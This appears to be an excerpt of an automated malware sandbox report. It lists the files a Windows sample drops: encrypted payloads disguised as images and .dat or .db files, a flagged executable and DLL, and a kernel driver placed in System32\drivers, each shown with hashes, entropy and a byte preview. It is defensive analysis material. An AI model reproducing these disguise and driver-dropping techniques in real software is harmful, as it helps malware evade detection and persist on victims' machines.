                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FOM-53[1].jpg

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):366410
                                              Entropy (8bit):7.375315637594966
                                              Encrypted:false
                                              SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                              MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                              SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                              SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                              SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d[1].gif

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3892010
                                              Entropy (8bit):7.995495589600101
                                              Encrypted:true
                                              SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                              MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                              SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                              SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                              SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                              Malicious:false
                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\f[1].dat

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):879
                                              Entropy (8bit):4.5851931774575325
                                              Encrypted:false
                                              SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                              MD5:E54C4296F011EC91D935AA353C936E34
                                              SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                              SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                              SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                              Malicious:false
                                              Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):5.275203330875829
                                              Encrypted:false
                                              SSDEEP:6:WSku4rj7zd3kiaqK+CrCa2BIDRD/COkngwAqwVLEFG7OdUzW9E40/qcX:Yrrj7ZUiaVMBIDRlqkEFggUzWg3
                                              MD5:7E4165B1411CF0914B7DB88CBD5C6A68
                                              SHA1:B6BAA59BE8644C12B1926B42B8701CCF321CAECE
                                              SHA-256:E0F4DABA7B631080FCAB4682C2A2EA64CCE957C08B32683E5F03E0515B4576E0
                                              SHA-512:5EA8834BDD607A75B0887D38058F20D50E96A01ED68EFA1632A9C77F2686834CF333DCF10138827847E3BD39D174F5DD4B0C2FE335AB4D6886A6AD1393EE0A00
                                              Malicious:false
                                              Preview:....l%00]CT.rp/n..C.c oh....a(gj....gw*g..H.(ao`````````````````````````````````....c*??RL[.}. a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33^@W.qs,m..@.`#lk....b+di....dt)d..K.)`naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....b+>>SMZ.|~!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\FOM-50[1].jpg

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):55085
                                              Entropy (8bit):7.99273647746538
                                              Encrypted:true
                                              SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                              MD5:DC44AE348E6A74B3A74871020FDFAC74
                                              SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                              SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                              SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\a[1].gif

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):135589
                                              Entropy (8bit):7.995304392539578
                                              Encrypted:true
                                              SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                              MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                              SHA1:561836F6228E24180238DF9456707A2443C5795C
                                              SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                              SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                              Malicious:false
                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s[1].dat

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):28272
                                              Entropy (8bit):7.711658199738615
                                              Encrypted:false
                                              SSDEEP:384:9aegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQE:x5F1FUdy422IK+gAZt2i0YPpQn4GMX
                                              MD5:85C558B2E6A863EF997650572603558A
                                              SHA1:EC165983E730584D0B4860A0BFCDF0DB4396688E
                                              SHA-256:A453D09D27EED18200EBA7972BA7093C8D4911462C2AF0ABF74E800781857F98
                                              SHA-512:80BE2FDF1F08FECAE6DD51069B878EC82AA5A8C819415DB7E780293EDD5091F25F2B2955AC5D74B1775B0603690BDC799B8F7C4768BD2C487DAD103F5D94FB39
                                              Malicious:false
                                              Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.icbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\FOM-52[1].jpg

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5062442
                                              Entropy (8bit):7.999518892518095
                                              Encrypted:true
                                              SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                              MD5:70C21DA900796B279A09040B00953E40
                                              SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                              SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                              SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                              Malicious:false
                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\c[1].gif

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):10681
                                              Entropy (8bit):7.866148090449211
                                              Encrypted:false
                                              SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                              MD5:10A818386411EE834D99AE6B7B68BE71
                                              SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                              SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                              SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                              Malicious:false
                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\drops[1].jpg

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):37274
                                              Entropy (8bit):7.991781062764932
                                              Encrypted:true
                                              SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                              MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                              SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                              SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                              SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                              Malicious:false
                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                              C:\Users\user\Documents\EMp3o1.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):133136
                                              Entropy (8bit):6.350273548571922
                                              Encrypted:false
                                              SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                              MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                              SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                              SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                              SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\Documents\MsMpList.dat

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):3889557
                                              Entropy (8bit):7.999938755105324
                                              Encrypted:true
                                              SSDEEP:98304:WAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:1ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                              MD5:9332C4190037A0299311D62BFD631BD8
                                              SHA1:C4C3BEFA07BFD1DBE686D83F70DE6B60CA4171E6
                                              SHA-256:F83D586B97C4FE9D93D70D5C768B3787C24336CAA4D0BF816F5AB51118622452
                                              SHA-512:C92A0AF3CEF4E905658FA64A85651DC592955402DEDFA03B70F39EA11BFE907F52DE195B06CD017C3EC780642CF18391CA0A837A818BE2279CCBA247B24CEC5C
                                              Malicious:false
                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                              C:\Users\user\Documents\WordpadFilter.db

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:GIF image data, version 89a, 10 x 10
                                              Category:dropped
                                              Size (bytes):8228
                                              Entropy (8bit):7.9789770028772695
                                              Encrypted:false
                                              SSDEEP:192:eBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:eBuNhyTlBU2dp+1XrBuCgp9vU0l
                                              MD5:A6058655E8AECC6096071B777FAC991C
                                              SHA1:C5CBC0932FFED34AC37101FB3362EBB6E5270D40
                                              SHA-256:D7E023FA2024919B641FDC5C3EA78D25C22A25BE44775CDC27DFC305ECC04D49
                                              SHA-512:6A31FB685BBA3B576CDE8C18DC8C14F7A8B8C80585B0543B7AED6D76CFBC923F7D31487F37578AE4F58AC197824F512FB9B96D06B8CC3F04E4BDA3F3C0F2170B
                                              Malicious:false
                                              Preview:GIF89a.......,.E.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                              C:\Users\user\Documents\vselog.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):122880
                                              Entropy (8bit):6.002045097872406
                                              Encrypted:false
                                              SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52F4:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5g4
                                              MD5:EF516B8A7AF8FC9595B248AC41462601
                                              SHA1:4EA9886DF455BBF89091EED4F7C8077A97933ADA
                                              SHA-256:751473DCC40ED147B0DDAE64773D40C404222740445B99CEE0A61B1D12E58BCB
                                              SHA-512:B438A4B4FCE58631D163CFEBDB4C7B477B5D67974D00E9356A72C3B65082A1A38077FA79A92E338803B09ACDA108729342CE5D15D0738B30845CA14FAC082929
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                              C:\Windows\System32\drivers\189atohci.sys

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):28272
                                              Entropy (8bit):6.229053474404253
                                              Encrypted:false
                                              SSDEEP:384:A3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/X:AOUkgfdZ9pRyv+uPzCMHo3q4tDgh1
                                              MD5:0018003D4C69C74EEE669F567FACFA97
                                              SHA1:53124F2FCF1C866C395D94D8885B997B561B59D4
                                              SHA-256:D2B1E51EAF700909DF86108F021961970EC24721B66D3248F64BE7F15FC9482F
                                              SHA-512:E1721A1615C0FCCE43C1D0060B303949EDCA0D69C58B6EAE53D23AF719B75FD0DA563931E3C8F0BD1154083F5B0A0778FB17CAAE0A5AC7594CB272BAABD5EB97
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                              C:\xxxx.ini

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:y:y
                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
